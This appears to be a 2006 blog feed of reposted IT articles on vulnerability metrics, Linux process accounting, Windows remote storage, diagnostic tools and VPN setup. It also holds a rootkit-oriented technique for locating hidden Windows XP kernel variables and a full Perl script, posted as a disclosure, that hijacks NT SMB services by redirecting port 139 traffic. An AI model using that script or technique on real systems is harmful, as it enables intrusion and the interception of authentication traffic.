Many people won't have the time/patience (attention span) to read this excellent post through to the end. These folks are sometimes called "Executives". For them, let me just show the most important chart, graphing the weighted vulnerability count for workstation roles in Q3:

There it is - Windows XP with the least, Red Hat Enterprise Linux 4 WS with the most, and Ubuntu 6.06 falling in the middle. There is much more to this story however. To understand the definition of "weighted vulnerability count" and "workstation role" and to get more details, read on!

Introduction
So, now I will shift gears from disclosed vulnerabilities (as discussed in 2006 January through September Vulnerability Trends) to fixed vulnerabilities, as in fixed by the vendor. I will be using the same database as before for much of the information, especially disclosure dates, but will drive the primary analysis from vendor published security advisories at: http://rhn.redhat.com/errata, http://www.microsoft.com/technet/security/current.aspx, and http://www.ubuntu.com/usn.

In the past, I’ve done comparisons of Red Hat Enterprise Linux product with Windows products, a common criticism of the analysis has been that Red Hat ships with a lot of extra applications that should not be counted in an “apples to apples” comparison. I agree and I disagree, as I’ve outlined on my blog in the past under Apples, Oranges and Vulnerability Metrics. I also recently posted a discussion of how I might build a more Windows comparable workstation using Red Hat in Red Hat and Windows - Defining an Apples-to-Apples Workstation Build. To summarize, I think it best to look at things from multiple angles, since each perspective may provide different information. For example:

· A role-based comparison may provide useful information for comparing individual roles, such as a common workstation or Web server

· A comparison of all packages in a vendor product my provide some insight into the impact of using the product in multiple roles that leverage different combinations of packages

With that in mind, the set of metrics for each product will be measured against two configurations: the full configuration and one limited to a specific role. Details are provided in the appropriate sections that follow.

Products for analysis will be Microsoft Windows, Red Hat Enterprise Linux 4 WS and Ubuntu 6.06 LTS. Ubuntu products have been added because:

· I think Ubuntu clearly represents the “hot up and comer” position in the Linux distribution space

· Ubuntu added “Long Term Support” (LTS) with release 6.06, making this an Enterprise distribution

Both Novell Suse and Mandriva have Enterprise support lifecycle offerings, as well, and though I’m not including analysis of those here, I may include them in a year end analysis, once per year. In the meantime, Red Hat and Ubuntu should represent the Enteprise Linux community as both the leader and the interesting newcomer.

Vulnerability Metrics
In previous analyses, I have used total vulnerability counts as metrics, and also looked at severity breakdowns and most recently, a metric called WVI as defined by NIST and similar to that introduced by Mark Cox in Red Hat RHEL4 Risk Report. One of the benefits of the WVI metric is that is normalizes vulnerabilities by both severity and by time, in terms of weighted vulnerabilities per day.

As a first step in calculating WVI, the numerator is calculated by giving full value to High severity vulnerabilities, while Medium severity issues are divided by 5 and Low severity issues are divided by 20. I call this the Weighted Vulnerability Count (Vw). The second step in calculating the WVI is to divide the Vw by the time period involved. Dividing by time allows one to compare lifetime vulnerabilities for products that have been in the market for varying amounts of time.

In my comparisions, I am going to call out both the Vw, or weighted count, and the WVI. The Vw may be thought of as a rough approximation of the number of equivalent High severity issues that occurred in a period. Here are the formulas:

Vw = (High) + (Medium / 5) + (Low / 20)

WVI = Vw / days

Workstation Products
In this section, I will analyze workstation products. For the three products studied, the configurations were defined as follows:

· For Windows XP SP2, I took the worst case assumption that all components were present in a standard workstation role. This means that metrics for “all packages” and “workstation role” will be equivalent and yes, Internet Explorer is included in the analysis.

· For Red Hat Enterprise Linux 4 WS (rhel4ws), there were two distinct configurations.

o Rhel4ws-all consists of all components that Red Hat chose to ship and support as part of the official rhel4ws product. This configuration represents the union of all workstation roles and applications that might be deployed in an enterprise to support office workers, developers, network specialists, marketing professionals, etc.

o Rhel4ws-ws consists of just the default installation group components, excluding for OpenOffice and gimp, which were explicitly disabled. Note that by default, none of the optional “server” packages are installed either. This configuration represents a more minimal, but useful, configuration that is comparable to Windows XP. Firefox is included, for example, but Thunderbird is not.

· Ubuntu 6.06 LTS. For Ubuntu, there were two distinct configurations – Ubuntu-all and Ubuntu-ws.

o For Ubuntu-all, any vulnerability patched for Ubuntu 6.06 LTS by Ubuntu in an Ubuntu Security Notice was counted as part of analysis.

o For Ubuntu-ws, the configuration consisted of the default packages installed, except for OpenOffice and gimp, which were excluded.

The Quarter: Q3 2006
Looking first at all packages or components for each product (workstation-all), Figure 8 charts the weighted vulnerability counts, Vw. Keep in mind that this measure may be useful in terms of:

· Seeing the weighted equivalent number of High severity vulnerabilities

· That could apply in union across multiple workstation role deployments such as office worker, developer, network engineer, etc.

The chart shows that Red Hat Enterprise Linux 4 WS (rhel4ws) had the highest number of vulnerabilities across all components that are part of the product, doubling Ubuntu 6.06 and tripling Windows XP.

Figure 8: Weighted Workstation-all Vulnerabilities for Q3

But what about a basic workstation role that did not include all of the many optional components that ship with Red Hat and Ubuntu? Figure 9 charts the answer to this question, measuring only the vulnerabilities in components that might be in a basic workstation as defined in the configuration section above.

Figure 9: Weighted Workstation-ws Vulnerabilities for Q3

Note that the Windows Vw value for the quarter stays the same, since it is the same configuration, but that the Red Hat workstation and the Ubuntu workstation have lower Vw values, though the order of low to high remains the same.

2006 Year to date – January through September
Any quarter can be anomalous of course, so next I will look at the numbers for the entire year up to this point. Figure 10 charts the WVI for the first 3 quarters of the year. Note that though Ubuntu only shipped on June 1, we can still chart a Q2 value since the WVI formula normalizes for the time available.

Figure 10: Quarterly Workstation-ws WVI

Another way to look at the vulnerabilities patched by the vendors year to date is to calculate the WVI for the entire period instead of quarterly. This measurement helps us see the period as a whole when individual quarters could show a lot of fluctuation.

Figure 11: Workstation-ws 2006 WVI for January through September

Figure 11 charts the January through September WVI for us and does show that, for the entire year, the Red Hat workstation WVI is not as drastically higher than the other products as seen in Q3 alone. It might be that looking at an even longer period would smooth out any anomalous periods even further, so as a last check, let’s look at the lifetime of each product.

Product Lifetimes
Microsoft Windows XP has been generally available the longest, since October 2001. Red Hat Enterprise Linux 4 has been available since February 2005 and, as mentioned before, Ubuntu 6.06 has only been available since June 1st of this year. This section won’t affect Ubuntu much since its lifetime isn’t much longer than the last quarter, but it could provide a more normalized view of vulnerability disclosure rates for Red Hat and Windows XP.

Figure 12 charts WVI for all components for the lifetime of each product. We can easily observe that in this view, the weighted daily vulnerability fix rate for two Linux distributions is much closer than when we looked at the most recent quarter and year to date metrics.

Figure 12: Lifetime WVI for Workstation-all

I can also see that over the lifetime of the products, the two Linux distributions have a WVI roughly three times higher than Windows XP. Now let’s look at just the basic workstation configurations, rather than all components. Based upon popular perception, one might expect the two Linux distributions’ WVI to drop down below Windows XP when the extraneous optional components are removed. However, contrary to that perception, Figure 13 shows that the WVI for both Linux distribution is still over twice that of Windows XP.

Figure 13: Lifetime WVI for Workstation-ws

I can already anticipate some of the thoughts that this workstation analysis will cause for Linux advocates. The workstation builds include X-Windows, servers don’t have to include that. Workstations have browsers, servers don’t have to include that. All true, and in the next section, we’ll again look at configurations that represent the union of several roles (none of which include X or the browser!), as well as dig into a comparison of just a web server role.

Until this, I hope this analyis has been useful. Regards ~ Jeff

How to keep a detailed audit trail of what’s being done on your Linux systems

2006-11-21T20:59:00.000-08:00

原始链接：http://www.cyberciti.biz/tips/howto-log-user-activity-using-process-accounting.html

Intrusions can take place from both authorized (insiders) and unauthorized (outsiders) users. My personal experience shows that unhappy user can damage the system, especially when they have a shell access. Some users are little smart and removes history file (such as ~/.bash_history) but you can monitor all user executed commands.

It is recommended that you log user activity using process accounting. Process accounting allows you to view every command executed by a user including CPU and memory time. With process accounting sys admin always find out which command executed at what time

The psacct package contains several utilities for monitoring process activities, including ac, lastcomm, accton and sa.

The ac command displays statistics about how long users have been logged on.
The lastcomm command displays information about previous executed commands.
The accton command turns process accounting on or off.
The sa command summarizes information about previously executed commmands.
Task: Install psacct or acct package
Use up2date command if you are using RHEL
# up2date psacct
Use yum command if you are using CentOS/Fedora Core Linux:
# yum install psacct

Use apt-get command if you are using Ubuntu / Debian Linux:
$ sudo apt-get install acct OR # apt-get install acct

Task: Start psacct/acct service
By default service is started on Ubuntu / Debian Linux by creating /var/account/pacct file. But under Red Hat /Fedora Core/Cent OS you need to start psacct service manually. Type the following two commands to create /var/account/pacct file and start services:
# chkconfig psacct on
# /etc/init.d/psacct start

If you are using Suse Linux, the name of service is acct. Type the following commands:
# chkconfig acct on
# /etc/init.d/acct start

Now let us see how to utilize these utilities to monitor user commands and time.

Task: Display statistics about users’ connect time
ac command prints out a report of connect time in hours based on the logins/logouts. A total is also printed out. If you type ac without any argument it will display total connect time:
$ acOutput:

total 95.08
Display totals for each day rather than just one big total at the end:
$ ac -dOutput:

Nov 1 total 8.65
Nov 2 total 5.70
Nov 3 total 13.43
Nov 4 total 6.24
Nov 5 total 10.70
Nov 6 total 6.70
Nov 7 total 10.30
.....
..
...
Nov 12 total 3.42
Nov 13 total 4.55
Today total 0.52
Display time totals for each user in addition to the usual everything-lumped-into-one value:
$ ac -pOutput:

vivek 87.49
root 7.63
total 95.11
Task: find out information about previously executed user commands
Use lastcomm command which print out information about previously executed commands. You can search command using usernames, tty names, or by command names itself.

Display command executed by vivek user:
$ lastcomm vivekOutput:

userhelper S X vivek pts/0 0.00 secs Mon Nov 13 23:58
userhelper S vivek pts/0 0.00 secs Mon Nov 13 23:45
rpmq vivek pts/0 0.01 secs Mon Nov 13 23:45
rpmq vivek pts/0 0.00 secs Mon Nov 13 23:45
rpmq vivek pts/0 0.01 secs Mon Nov 13 23:45
gcc vivek pts/0 0.00 secs Mon Nov 13 23:45
which vivek pts/0 0.00 secs Mon Nov 13 23:44
bash F vivek pts/0 0.00 secs Mon Nov 13 23:44
ls vivek pts/0 0.00 secs Mon Nov 13 23:43
rm vivek pts/0 0.00 secs Mon Nov 13 23:43
vi vivek pts/0 0.00 secs Mon Nov 13 23:43
ping S vivek pts/0 0.00 secs Mon Nov 13 23:42
ping S vivek pts/0 0.00 secs Mon Nov 13 23:42
ping S vivek pts/0 0.00 secs Mon Nov 13 23:42
cat vivek pts/0 0.00 secs Mon Nov 13 23:42
netstat vivek pts/0 0.07 secs Mon Nov 13 23:42
su S vivek pts/0 0.00 secs Mon Nov 13 23:38

For each entry the following information is printed. Take example of first output line:
userhelper S X vivek pts/0 0.00 secs Mon Nov 13 23:58
Where,

userhelper is command name of the process
S and X are flags, as recorded by the system accounting routines. Following is the meaning of each flag:
S — command executed by super-user
F — command executed after a fork but without a following exec
D — command terminated with the generation of a core file
X — command was terminated with the signal SIGTERM
vivek the name of the user who ran the process
prts/0 terminal name
0.00 secs - time the process exited
Search the accounting logs by command name:
$ lastcomm rm
$ lastcomm passwdOutput:

rm S root pts/0 0.00 secs Tue Nov 14 00:39
rm S root pts/0 0.00 secs Tue Nov 14 00:39
rm S root pts/0 0.00 secs Tue Nov 14 00:38
rm S root pts/0 0.00 secs Tue Nov 14 00:38
rm S root pts/0 0.00 secs Tue Nov 14 00:36
rm S root pts/0 0.00 secs Tue Nov 14 00:36
rm S root pts/0 0.00 secs Tue Nov 14 00:35
rm S root pts/0 0.00 secs Tue Nov 14 00:35
rm vivek pts/0 0.00 secs Tue Nov 14 00:30
rm vivek pts/1 0.00 secs Tue Nov 14 00:30
rm vivek pts/1 0.00 secs Tue Nov 14 00:29
rm vivek pts/1 0.00 secs Tue Nov 14 00:29
Search the accounting logs by terminal name pts/1
$ lastcomm pts/1

Task: summarizes accounting information
Use sa command to print summarizes information about previously executed commands. In addition, it condenses this data into a summary file named savacct which contains the number of times the command was called and the system resources used. The information can also be summarized on a per-user basis; sa will save this iinformation into a file named usracct.
# saOutput:

579 222.81re 0.16cp 7220k
4 0.36re 0.12cp 31156k up2date
8 0.02re 0.02cp 16976k rpmq
8 0.01re 0.01cp 2148k netstat
11 0.04re 0.00cp 8463k grep
18 100.71re 0.00cp 11111k ***other*
8 0.00re 0.00cp 14500k troff
5 12.32re 0.00cp 10696k smtpd
2 8.46re 0.00cp 13510k bash
8 9.52re 0.00cp 1018k less
Take example of first line:
4 0.36re 0.12cp 31156k up2date
Where,

0.36re “real time” in wall clock minutes
0.12cp sum of system and user time in cpu minutes
31156k cpu-time averaged core usage, in 1k units
up2date command name
Display output per-user:
# sa -uOutput:

root 0.00 cpu 595k mem accton
root 0.00 cpu 12488k mem initlog
root 0.00 cpu 12488k mem initlog
root 0.00 cpu 12482k mem touch
root 0.00 cpu 13226k mem psacct
root 0.00 cpu 595k mem consoletype
root 0.00 cpu 13192k mem psacct *
root 0.00 cpu 13226k mem psacct
root 0.00 cpu 12492k mem chkconfig
postfix 0.02 cpu 10696k mem smtpd
vivek 0.00 cpu 19328k mem userhelper
vivek 0.00 cpu 13018k mem id
vivek 0.00 cpu 13460k mem bash *
lighttpd 0.00 cpu 48240k mem php *

Display the number of processes and number of CPU minutes on a per-user basis
# sa -mOutput:

667 231.96re 0.17cp 7471k
root 544 51.61re 0.16cp 7174k
vivek 103 17.43re 0.01cp 8228k
postfix 18 162.92re 0.00cp 7529k
lighttpd 2 0.00re 0.00cp 48536k
Task: Find out who is eating CPU By looking at re, k, cp/cpu (see above for output explanation) time you can find out suspicious activity or the name of user/command who is eating up all CPU. An increase in CPU/memory usage (command) is indication of problem.Please note that above commands and packages also available on other UNIX like oses such as Sun Solaris and *BSD oses.

Using Remote Storage To Extend Available Storage Space

2006-11-21T20:58:00.001-08:00

文章作者：Brien M. Posey

In the early 1990’s, I started my first job as a network administrator. At the time, I was working for a large insurance company with an enterprise class network. The company’s largest file server had about a gigabyte of storage space. I remember thinking that it would take an eternity for the users on that server to consume a gigabyte of disk space. Today though, there are consumer grade PCs that come standard with a half a terabyte of storage space. It boggles my mind to think about how much disk space a large enterprise requires.

For many large organizations, there comes a point when the existing systems simply won’t support adding any more storage without investing in additional hardware (new servers, SAN, NAS, etc.). If the organization is budget strapped, one solution to containing the ever growing collection of user data is to implement remote storage. In this article, I will show you how.

What is Remote Storage?
To understand what remote storage is and how it works, imagine that you have a server with a terabyte of disk space. That sounds like a lot, but if you have a thousand users, then your server has a total capacity of less than one gigabyte per user. That’s still quite a bit of space, but depending on what type of files the users are creating, a gigabyte can be used up quickly. At any rate, let’s assume that you are burning through your disk space at an uncomfortable rate and setting disk quotas is not an option.

One thing that you can do to cope with the problem is to implement remote storage. The idea behind remote storage is that it allows you to use space on backup tapes as disk space. To put it bluntly, it allows you to lie to your server about how much free disk space it has.

Those of us who work solely with PCs have traditionally been conditioned to think of tape drives only as a backup mechanism. However, Windows Server’s remote storage feature allows you to use a tape in the same way that you would use a hard disk. Let’s say for example that your terabyte of disk space was just about filled to the limit. Obviously, Windows does not want you to run out of disk space. To prevent this from happening, Windows goes through your user’s files looking for files that have not been used in a long time. When such files are found, they are moved from the hard disk onto tape.

OK, let’s stop right there. Moving old files from disk to tape probably sounds more like archiving than increasing the machine’s overall storage capacity. There is a difference though. With traditional archiving, the tape is locked away in a vault, usually never to be seen again. With remote storage, the tape stays online. If a user looks at the contents of their home directory, they will continue to see all of their files, regardless of how long it has been since a file has been used. If a user decides to use a file that has been moved to tape, the system simply retrieves the file from tape and moves the file to the hard disk.

Isn’t Remote Storage Slow?
Every time that I have tried to explain remote storage to someone in the past, it is inevitable that when I get to this point, they ask the question “sure it works, but isn’t it slow?” Well, slow is a relative term. Tape drives are a whole lot faster than they used to be. The HP StorageWorks Ultrium 960 tape drive for example boasts a 160 MB/s sustained transfer rate. Of course it still takes time to locate the necessary file on the tape and to copy the file to the server’s hard disk, so yes, the process takes a little bit longer than if the file were read directly from the server’s hard disk.

Although it does take more time for the server to access a file from remote storage than it does to access a file from the server’s hard disk, things are really not as bad as they sound. Remember that only files that have not been used for months are moved to remote storage. Odds are that most of the files that get moved to remote storage will probably never be used again. For example, on my own network, I have financial records dating back to 1994. There’s no way that I am ever going to need these records again (I hope), but my accountant insists that I keep them for legal reasons. The same thing goes on in corporate networks. Employees are being pressured to keep all documents for legal reasons, even if the document is no longer useful.

My point is that you might occasionally have a user access a file that’s in remote storage, but it’s not something that is probably going to occur on a daily basis. Sure, users will notice that it takes a little longer to access really old files, but they probably won’t be accessing these files often enough for it to make a difference to anyone. Otherwise, the files wouldn’t have been moved to remote storage in the first place.

How Much Space Can You Gain?
Now that I have talked about what remote storage is and how it works, you might be wondering how much storage space you can really gain by using remote storage. I’m by no means a tape drive hardware expert, but I did a quick check on the Internet to see how much data could be stored on a high capacity tape. I’m not sure if this is the highest capacity tape available or not, but the LTO 3 tape media can hold 800 GB of data (compressed).

If we go back to my previous example of a file server with a terabyte of storage that is quickly filling up, you can see that adding 800 GB of storage space in the form of remote storage would almost double the server’s total capacity. Of course there are plenty of servers out there with much more than a terabyte of disk capacity. For higher end servers, you could always use an auto loader with a 16 tape magazine. Sixteen tapes at 800 GB each would provide you with twelve and a half terabytes of remote storage space.

Setting up Remote Storage
To setup remote storage, open the Control Panel and double click on the Add / Remove Programs icon. When you see the Add / Remove Programs properties sheet, click the Add / Remove Windows Components button. Next, select the Remote Storage check box from the resulting window and click the Next button to continue. Windows will now copy a few files and ask you to reboot the server.

When the computer reboots, go to the Start menu and select All Programs | Administrative Tools | Remote Storage. When you do, the Remote Storage Setup Wizard will launch. The wizard will ask you which volume you want to manage, and will detect your removable media. The wizard will also help you set a schedule for moving old files to remote storage.

Reconfiguring Remote Storage
It’s likely that as time goes on, your remote storage needs will change. You may want to add or remove volumes from the remote storage list for example. Fortunately, remote storage is very flexible. If you want to add a volume to the remote storage list, simply slect the Remote Storage command from the Administrative Tools menu. Since the Remote Storage Wizard has been run once already, selecting this menu option will take you directly to the Remote Storage console rather than launching the Remote Storage Wizard.

When the management console opens, right click on the Managed Volumes container and select the New | Managed Volumes command from the resulting shortcut menus. Doing so will launch the Add Volumes Management Wizard. The Add Volumes Management Wizard works very similarly to the initial remote storage setup. Just use the wizard to select which volumes you want to manage.

The Managed Volumes container can also be used for changing the stipulations for moving a file to remote storage. To do so, right click on a volume and select the Properties command from the shortcut menu. When the volume’s properties sheet appears, select the Settings tab. The Settings tab allows you to control the desired amount of free disk space on the volume, the minimum size of files that are to be moved to remote storage, and the amount of time since the file has been accessed.

Conclusion
In this article, I have explained that remote storage provides you with a way of increasing your server’s total storage capacity by moving old files into a continuously accessible archive. It’s important to keep in mind though that there are many different ways of increasing a server’s available storage space. Implementing remote storage may not always be the most cost effective method or might not be right for your organization’s individual needs. I therefore recommend considering the cost and the impact of other types of storage prior to investing in remote storage.

About Brien M. Posey
Brien Posey is an award winning author who has written over 3,000 articles and written or contributed to 27 books. You can visit Brien’s personal Web site at www.brienposey.com

MS OCA & RAM/HDD Diagnostic Tools

2006-11-21T20:57:00.001-08:00

Microsoft Online Crash Analysis:

使用 Microsoft Windows 操作系统难免会碰到蓝色死亡画面（blue screen of death），通常画面都会提供许多信息来让人除错（debug），不过许多人并不会取解读这些讯息，而且即使是同一个错误代码，也有可能是许多不同的原因所造成的。

　　微软提供这个窗口操作系统当机分析的线上服务，希望大家可以好好利用，不过它也有一些限制，OS 必须是 Windows 2000 or Windows XP 以上的版本，IE 要 5.0 以后的版本。

Microsoft Online Crash Analysis
KB316450 - How to Send a Full or Kernel Dump to Microsoft Windows Online Crash Analysis

RAM Diagnostic Tools:

另外，在微软 OCA 的网站上有提供内存检测程序 Windows Memory Diagnostic，因为许多的当机其实是由于内存的缺陷所造成的，先自己做相关的检测排除内存问题之后，再来查找其它信息，应该有助于问题了厘清与解决。根据微软网页的说明，此一测试程序在大部分的情况下可以在 30 分钟内完成。

DocMemory
Memtest86

HDD Diagnostic Tools:

FJDT/Sdiag of Fujitsu
DFT (Drive Fitness Test) of HGST (Hitachi Global Storage Technologies)
PowerMax of Maxtor
Bootable CD .ISO image file
Shdiag of Samsung
SeaTools of Seagate
Data Lifeguard Diagnostics / Data Lifeguard Tools of WD (Western Digital)

Data Recovery:

FinalData
Ontrack Data Recovery
ACE Laboratory - Data recovery Hard Drives tools

Other Tools:

http://www.simplisoftware.com/Public/index.php?request=HdTach

Finding some non-exported kernel variables

2006-11-21T20:56:00.003-08:00

Finding some non-exported kernel variables
in Windows XP

by Edgar Barbosa

I'n the great majority of kernel modules that
needs to get the value of some non-exported
variable of the kernel, the solution was
scan the kernel in the memory to find
specific opcodes or specific signatures.
But I'd founded a new way to get some of
those hidden variables in the kernel by
a new undocumented field in an old structure
called Processor Control Region.

Let's see it:

KPCR STRUCT

; Start of the architecturally defined section of the PCR. This section
; may be directly addressed by vendor/platform specific HAL code and will
; not change from version to version of NT.

NtTib NT_TIB <>
SelfPcr PVOID ? ; 1Ch
Prcb PVOID ? ; 20h
Irql BYTE ? ; 24h
db 3 dup(?) ; padding
IRR DWORD ? ; 28h
IrrActive DWORD ? ; 2Ch
IDR DWORD ? ; 30h
Reserved2 DWORD ? ; 34h
IDT PVOID ? ; 38h
GDT PVOID ? ; 3Ch
TSS PVOID ? ; 40h PTR KTSS
MajorVersion WORD ? ; 44h
MinorVersion WORD ? ; 46h
SetMember KAFFINITY ? ; 48h
StallScaleFactor DWORD ? ; 4Ch
DebugActive BYTE ? ; 50h
Number BYTE ? ; 51h
db 2 dup(?) ; 052 padding
KPCR ENDS

While playing with the kernel of Windows XP, and
looking for the KPCR area, I'd perceived that
0xffdff034 (Reserved2 field) was not equal 0x0, as
usual in Windows 2000.
And while dumping this new pointer in XP, I'd
founded some very important hidden kernel variables
like:

PsActiveProcessHead
PsLoadedModuleList
MmPfnDatabase
PspCidTable
ObpRootDirectoryObject and more...

Then, I saw the following change in
WinDbg:

lkd> dt _KPCR
+0x000 NtTib : _NT_TIB
+0x01c SelfPcr : Ptr32 _KPCR
+0x020 Prcb : Ptr32 _KPRCB
+0x024 Irql : UChar
+0x028 IRR : Uint4B
+0x02c IrrActive : Uint4B
+0x030 IDR : Uint4B

+0x034 KdVersionBlock : Ptr32 Void
+0x038 IDT : Ptr32 _KIDTENTRY
+0x03c GDT : Ptr32 _KGDTENTRY
+0x040 TSS : Ptr32 _KTSS
+0x044 MajorVersion : Uint2B
+0x046 MinorVersion : Uint2B
+0x048 SetMember : Uint4B
+0x04c StallScaleFactor : Uint4B
+0x050 DebugActive : UChar
+0x051 Number : UChar
+0x052 Spare0 : UChar
+0x053 SecondLevelCacheAssociativity : UChar
+0x054 VdmAlert : Uint4B
+0x058 KernelReserved : [14] Uint4B
+0x090 SecondLevelCacheSize : Uint4B
+0x094 HalReserved : [16] Uint4B
+0x0d4 InterruptMode : Uint4B
+0x0d8 Spare1 : UChar
+0x0dc KernelReserved2 : [17] Uint4B
+0x120 PrcbData : _KPRCB

What is the KdVersionBlock ?
While looking in the Google for some
page that have all the kernel variables
listed above, I founded the following
include file:

http://dotnet.di.unipi.it/Content/sscli/docs/doxygen/tools/sos/global
s.html

And the structure that I'd founded appears to be
the same of the KDDEBUGGER_DATA32 structure.
Then I created the getvar (get in the www.rootkit.com)
program to make a test
and it worked perfectly in Windows XP

Now, for example, to get the PsActiveProcessHead, is just
a question of :

mov eax, 0ffdff034h
mov eax, [eax]
mov eax, [eax+078h]

Now, you have the PsActiveProcessHead with just 3 instructions!!!
Well, I hope this text to be useful to the Rootkit community!
Any errors or questions to: embarbosa AT yahoo DOT com

Regards,
Opc0de

NT needs privileged ports

2006-11-21T20:56:00.001-08:00

NT really needs privileged ports now. I include below a variation
of the perl script I posted a couple of weeks ago that shows how the
security hole recently announced by L0pht can be used to take over SMB
services on NT boxes.

This security hole does have its bright side though. We were having a
discussion (raging debate!) on the merits of changing the port number
for CIFS/SMB. At the time I said that any change in port number would
be bad because changing to another privileged port would still leave
existing NT servers insecure as they lack the concept of privileged
ports.

This security hole means that all existing NT servers are already
insecure (with exactly the same security hole that I was worried
about) so we can safely change the port number to another privileged
port without any security consequences. Paul Leach has told me (in a
private email) that Microsoft in fact has already got a port number,
port 445, that they can use.

This leaves some other objections to the port number change, namely
the fact that it subverts existing decisions by firewall
administrators, but we may decide to pay that price for the ability to
separate CIFS from other netbios protocols. As long as a privileged
port is used then the change should be acceptable to most people.

Andrew

#!/usr/bin/perl

# This script demonstrates a major security problem with
# Windows NT4. It is based on an earlier script (paul.pl) that
# demonstrated a problem with a protocol change that Microsoft
# proposed. The change in this script takes advantage of a security
# hole pointed out by L0pht (http://www.l0pht.com/).

# What this script does is allow any unprivileged user on a NT Server
# to redirect the local SMB services to any other SMB server which they
# have an IP address for. This allows the user to redirect file,
# printer and authentication services to another server. This has
# enormous consequences for security.

# This script was written by Andrew Tridgell and is being sent to
# the CIFS discussion list so that CIFS developers become aware
# of this problem. It should be noted that the L0pht announcement
# (which predates this script) already provided an example command
# using netcat to achieve the same thing so this script does
# not actually offer malicious hackers anything more than what has
# already been widely distributed. I wrote this example so that
# the consequences would become clear to the people who are
# in a position to do something about fixing the problem.

# USAGE:
# To use this script install perl5 then run the command
# perl redirect.pl
# for example
# perl redirect.pl 192.168.2.13 192.168.2.10
# this would redirect any SMB connections made to the local
# server (whose IP address is 192.168.2.13) to the remote
# server 192.168.2.10. Any browsing, file access, authentication
# requests or printing done to the local server by SMB clients
# will be redirected to the remote server.

# WORKAROUND:
# There is no immediate fix to this security problem yet available. A
# workaround is to disable local login access to non-trusted users.
# This can be achieved using the "User Manager For Domains". At many
# sites this will be an acceptable solution because NT servers are
# often used only for remote file and printer services and do not
# really need to offer the ability for users to run arbitrary programs

# FIX:
# A proper fix will require a patch from Microsoft. Hopefully they will
# either implement privileged ports or they will get the socket
# options correct on all their servers so such bind() tricks are
# not possible.

use IO::Socket;
use IO::Select;

if ($#ARGV != 1) {
print "Usage: redirect.pl \n";
exit 0;
}

my $local = $ARGV[0];
my $target = $ARGV[1];

my $smbport = "139";
my $Msg;

# this is a *SMBSERVER netbios name
my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";

print "setting up redirection from $local to $target ...\n";

# Create a local socket
$sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,
Proto=>'tcp',Listen=>5,Reuse=>1);

while (1) {

print "listening on $local\n";

# Accept a connection
$IS = $sock1->accept() || die;

# Open a socket to the remote host
$OS = new IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>'tcp') || die;

print "connected to $target\n";

# Create a read set for select()
$rs = new IO::Select();
$rs->add($IS,$OS);

$first = 1;
$finished = 0;

while(! $finished) {
($r_ready) = IO::Select->select($rs,undef,undef,undef);

foreach $i (@$r_ready) {
$o = $OS if $i == $IS;
$o = $IS if $i == $OS;

recv($i,$Msg,8192,0);
if (! length $Msg) {
$finished = 1;
break;
}

if ($first && substr($Msg,0,1) eq "\x81") {
print "replacing called name\n";
$msg2 = join('',substr($Msg,0,5),$netbname,substr($Msg,37,length($Msg)-37));
send($o,$msg2,0);
$first = 0;
} else {
if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;}
send($o,$Msg,0);
}
}
}

# loop back to the top again
}

----------------------------------------------------------------
Users Guide http://www.microsoft.com/sitebuilder/resource/mailfaq.asp
contains important info including how to unsubscribe. Save time, search
the archives at http://discuss.microsoft.com/archives/index.html

How to configure a connection to a virtual private network (VPN) in Windows XP

2006-11-21T20:55:00.002-08:00

This article was previously published under Q314076
On This Page
SUMMARY
MORE INFORMATION
Overview of a VPN
Configure a VPN connection from a client computer
Troubleshoot VPN connections
APPLIES TO

SUMMARY
This step-by-step article describes how to create a new VPN connection in Microsoft Windows XP.

You can use a virtual private network (VPN) to connect components to one network by using another network, such as the Internet. Virtual private networks do this by "tunneling" through the Internet or another public network in a manner that provides the same security and features as a private network. With a VPN, connections across the public network can transfer data by using the routing infrastructure of the Internet, but to the user, the data seems to travel over a dedicated private link.

Back to the top

MORE INFORMATION
Overview of a VPN
A VPN is a method of connecting to a private network (for example, your office network) by way of a public network (for example, the Internet).

A VPN gives you the benefit of a dial-up connection to a dial-up server, plus the ease and flexibility of an Internet connection. Using an Internet connection permits you to connect to resources all over the world and still, in most places, connect to your office by making a local call to the nearest Internet access phone number. If you have a high-speed Internet connection such as cable or digital subscriber line (DSL) at your computer and at your office, you can communicate with your office at full Internet speed. This is much faster than any dial-up connection that uses an analog modem.

VPNs use authenticated links to make sure that only authorized users can connect to your network, and they use encryption to make sure that others cannot intercept and cannot use data that travels over the Internet. Windows XP achieves this security by using Point-to-Point Tunneling Protocol (PPTP) or Layer Two Tunneling Protocol (L2TP). A Tunneling Protocol is a technology that helps make the transfer of information over the Internet more secure from one computer to another.

VPN technology also permits a corporation to connect to its branch offices or to other companies over a public network, such as the Internet, while helping to maintain secure communications. The VPN connection across the Internet logically operates as a dedicated wide area network (WAN) link.

Back to the top

Configure a VPN connection from a client computer
To set up a connection to a VPN, follow these steps: 1. On the computer that is running Windows XP, confirm that the connection to the Internet is correctly configured.

For more information about how to test your Internet configuration, click the following article number to view the article in the Microsoft Knowledge Base:
314067 (http://support.microsoft.com/kb/314067/) How to troubleshoot TCP/IP connectivity with Windows XP
2. Click Start, and then click Control Panel.
3. In Control Panel, double-click Network Connections.
4. Click Create a new connection.
5. In the Network Connection Wizard, click Next.
6. Click Connect to the network at my workplace, and then click Next.
7. Click Virtual Private Network connection, and then click Next.
8. If you are prompted to, do one of the following: • If you use a dial-up connection to connect to the Internet, click Automatically dial this initial connection, and then click your dial-up Internet connection from the list.
• If you use a full-time connection such as a cable modem, click Do not dial the initial connection.

9. Click Next.
10. Type the name of your company or type a descriptive name for the connection, and then click Next.
11. Type the host name or the Internet Protocol (IP) address of the computer that you want to connect to, and then click Next.
12. Click Anyone's use if you want the connection to be available to anyone who logs on to the computer, or click My use only to make it available only when you log on to the computer, and then click Next.
13. Click to select the Add a shortcut to this connection to my desktop check box if you want to create a shortcut on the desktop, and then click Finish.
14. If you are prompted to connect, click No.
15. In the Network Connections window, right-click the new connection.
16. Click Properties, and then configure more options for the connection: • If you are connecting to a domain, click the Options tab, and then click to select the Include Windows logon domain check box to specify whether to request Windows logon domain information before you try to connect.
• If you want the computer to redial the connection if the line is dropped, click the Options tab, and then click to select the Redial if line is dropped check box.

To use the connection, follow these steps: 1. Use one of the following methods: • Click Start, point to Connect To, and then click the new connection.
• If you added a connection shortcut to the desktop, double-click the shortcut on the desktop.

2. If you are not currently connected to the Internet, Windows offers to connect to the Internet.
